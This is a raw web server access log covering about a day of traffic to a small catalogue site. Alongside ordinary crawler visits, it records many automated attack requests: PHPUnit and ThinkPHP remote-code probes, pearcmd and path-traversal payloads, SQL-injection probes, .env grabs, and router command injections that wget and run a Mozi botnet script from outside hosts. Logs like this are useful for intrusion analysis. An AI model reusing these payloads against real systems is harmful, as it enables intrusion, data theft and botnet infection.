120.195.30.140 - - [01/Oct/2024:15:27:18 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:19 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:20 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:20 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:21 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:21 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:22 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:23 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:24 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:24 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:25 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:25 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:26 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:27 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:27 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:28 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:29 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:29 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:30 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:31 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:34 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:34 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:39 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
66.249.66.42 - - [01/Oct/2024:15:51:27 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:15:51:33 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Googlebot-Image/1.0"
66.249.66.42 - - [01/Oct/2024:16:07:46 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.46.183.205 - - [01/Oct/2024:17:16:23 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [01/Oct/2024:17:39:38 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:17:39:38 +0200] "GET /skupine.php?skupina=105 HTTP/1.1" 200 18656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.145.110 - - [01/Oct/2024:18:15:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
138.246.253.24 - - [01/Oct/2024:18:34:09 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
66.249.66.43 - - [01/Oct/2024:18:49:39 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:19:03:43 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.244 - - [01/Oct/2024:19:08:32 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.66.44 - - [01/Oct/2024:19:12:38 +0200] "GET /info.php?sifra=13.092&skupina=38 HTTP/1.1" 200 17962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:19:36:11 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/info.php?sifra=13.092&skupina=38" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET //skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET //info.php?sifra=dbm020%27&skupina=0 HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=dbm020&skupina=0%27 HTTP/1.1" 200 17533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=kos%20001%27&skupina=0 HTTP/1.1" 200 16968 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=kos%20001&skupina=0%27 HTTP/1.1" 200 17397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.44 - - [01/Oct/2024:20:27:25 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.230.66.18 - - [01/Oct/2024:20:42:10 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.189:10522/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
66.249.66.42 - - [01/Oct/2024:20:44:44 +0200] "GET /info.php?sifra=16878&skupina=82 HTTP/1.1" 200 18780 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:20:48:48 +0200] "GET /info.php?sifra=HDEm140HW&skupina=86 HTTP/1.1" 200 19864 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.58.187.246 - - [01/Oct/2024:20:54:18 +0200] "GET /" 400 474 "-" "-"
198.235.24.167 - - [01/Oct/2024:21:27:31 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.78.6.216 - - [01/Oct/2024:21:44:26 +0200] "GET / HTTP/1.1" 200 20819 "-" "python-requests/2.32.3"
130.61.84.132 - - [01/Oct/2024:21:51:21 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:26 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:30 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:31 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:33 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:34 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:36 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:38 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:42 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:44 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:46 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:49 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:50 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:53 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:55 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:58 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:01 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:04 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:06 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:09 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:12 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:14 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:17 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:20 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:22 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:25 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:26 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:28 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:30 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:32 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:35 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:37 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:40 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:43 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:47 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:50 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:52 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:54 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:56 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:59 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:02 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:06 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:08 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:16 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
197.60.66.174 - - [01/Oct/2024:22:06:11 +0200] "GET /" 400 474 "-" "-"
197.60.66.174 - - [01/Oct/2024:22:06:11 +0200] "GET /" 400 474 "-" "-"
37.139.5.66 - - [01/Oct/2024:22:23:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 226 "-" "linus-torvalds-loves-you"
66.249.66.43 - - [01/Oct/2024:22:37:42 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.88.237.162 - - [01/Oct/2024:23:34:12 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.88.237.162:55268/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
111.249.168.230 - - [02/Oct/2024:00:13:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
143.198.55.238 - - [02/Oct/2024:00:15:46 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
143.198.55.238 - - [02/Oct/2024:00:15:46 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [02/Oct/2024:01:25:08 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:02:36:44 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:03:54:12 +0200] "GET /info.php?sifra=6202&skupina=54 HTTP/1.1" 200 17351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.237.68.225 - - [02/Oct/2024:05:23:45 +0200] "GET /info.php?sifra=HDEM135%27&skupina=82 HTTP/1.1" 200 18635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:05:23:45 +0200] "GET /info.php?sifra=HDEM135&skupina=82%27 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:05:28:54 +0200] "GET /info.php?sifra=HDEM100HW&skupina=82 HTTP/1.1" 200 20084 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:05:33:26 +0200] "GET /info.php?sifra=50155&skupina=40 HTTP/1.1" 200 17512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.203.210.146 - - [02/Oct/2024:05:44:24 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.120.115.119 - - [02/Oct/2024:06:34:52 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN"
167.94.146.50 - - [02/Oct/2024:07:09:34 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.146.50 - - [02/Oct/2024:07:09:38 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.50 - - [02/Oct/2024:07:09:38 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
197.46.223.83 - - [02/Oct/2024:07:24:04 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [02/Oct/2024:07:25:08 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:07:25:09 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.104 - - [02/Oct/2024:07:49:03 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.254 - - [02/Oct/2024:07:59:11 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [02/Oct/2024:08:24:09 +0200] "GET /info.php?sifra=1003031&skupina=44 HTTP/1.1" 200 18651 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.158.158.132 - - [02/Oct/2024:08:59:21 +0200] "POST /HNAP1/ HTTP/1.0" 400 - "-" "-"
205.210.31.203 - - [02/Oct/2024:09:10:13 +0200] "\x16\x03\x01" 200 20819 "-" "-"
205.210.31.203 - - [02/Oct/2024:09:10:13 +0200] "\x16\x03\x01" 200 20819 "-" "-"
41.37.74.141 - - [02/Oct/2024:09:25:46 +0200] "GET /" 400 474 "-" "-"
66.249.66.41 - - [02/Oct/2024:09:55:46 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:09:55:46 +0200] "GET /skupine.php?skupina=34&stran=2 HTTP/1.1" 200 25744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:10:40:04 +0200] "GET /info.php?sifra=D120IBBI&skupina=31 HTTP/1.1" 200 17806 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.81.167 - - [02/Oct/2024:11:16:49 +0200] "GET /slike/kosara-za-drva-kamin-pec.jpg HTTP/1.1" 200 9517 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
